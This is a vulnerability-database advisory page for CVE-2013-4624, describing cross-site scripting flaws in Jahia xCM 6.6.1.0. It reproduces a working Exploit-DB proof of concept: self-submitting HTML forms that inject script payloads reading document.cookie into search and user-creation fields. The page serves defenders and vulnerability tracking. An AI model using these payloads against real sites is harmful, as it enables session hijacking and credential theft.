CVE-2013-4624

medium

Published 2013-11-27 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

5.3

Description

Multiple cross-site scripting (XSS) vulnerabilities in Jahia xCM 6.6.1.0 before hotfix 7 allow remote attackers to inject arbitrary web script or HTML via (1) the site parameter to engines/manager.jsp, (2) the searchString parameter to administration/ in a search action, or the (3) username, (4) firstName, (5) lastName, (6) email, or (7) organization field to administration/ in a users action.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-38683 webapps php verified text · 2 KB

High-Tech Bridge · 2013-07-31

Jahia xCM - '/administration/' Multiple Cross-Site Scripting Vulnerabilities

text exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/61571/info
 
Jahia xCM is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
 
An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 
Jahia xCM 6.6.1.0 r43343 is vulnerable; other versions may also be affected. 

<form action="http://www.example.com/administration/?do=users&sub=search" method="post" name="main">
<input type="hidden" name="searchString" value="'><script>alert(document.cookie);</script>">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>


<form action="http://www.example.com/administration/?do=users&sub=processCreate" method="post" name="main">
<input type="hidden" name="username" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="manage-user-property#j:firstName" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="manage-user-property#j:lastName" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="manage-user-property#j:email" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="manage-user-property#j:organization" value="'><script>alert(document.cookie);</script>">
<input type="hidden" name="actionType" value='save'>
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>

EDB-38682 webapps php verified

High-Tech Bridge · 2013-07-31

Jahia xCM - '/engines/manager.jsp?site' Cross-Site Scripting

Source code queued for fetch — refresh in a moment.

Application impact

Vendor	Product	Versions	Fixed
jahia	jahia_xcm	`6.6.1`

References

CWEs

CWE-79

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.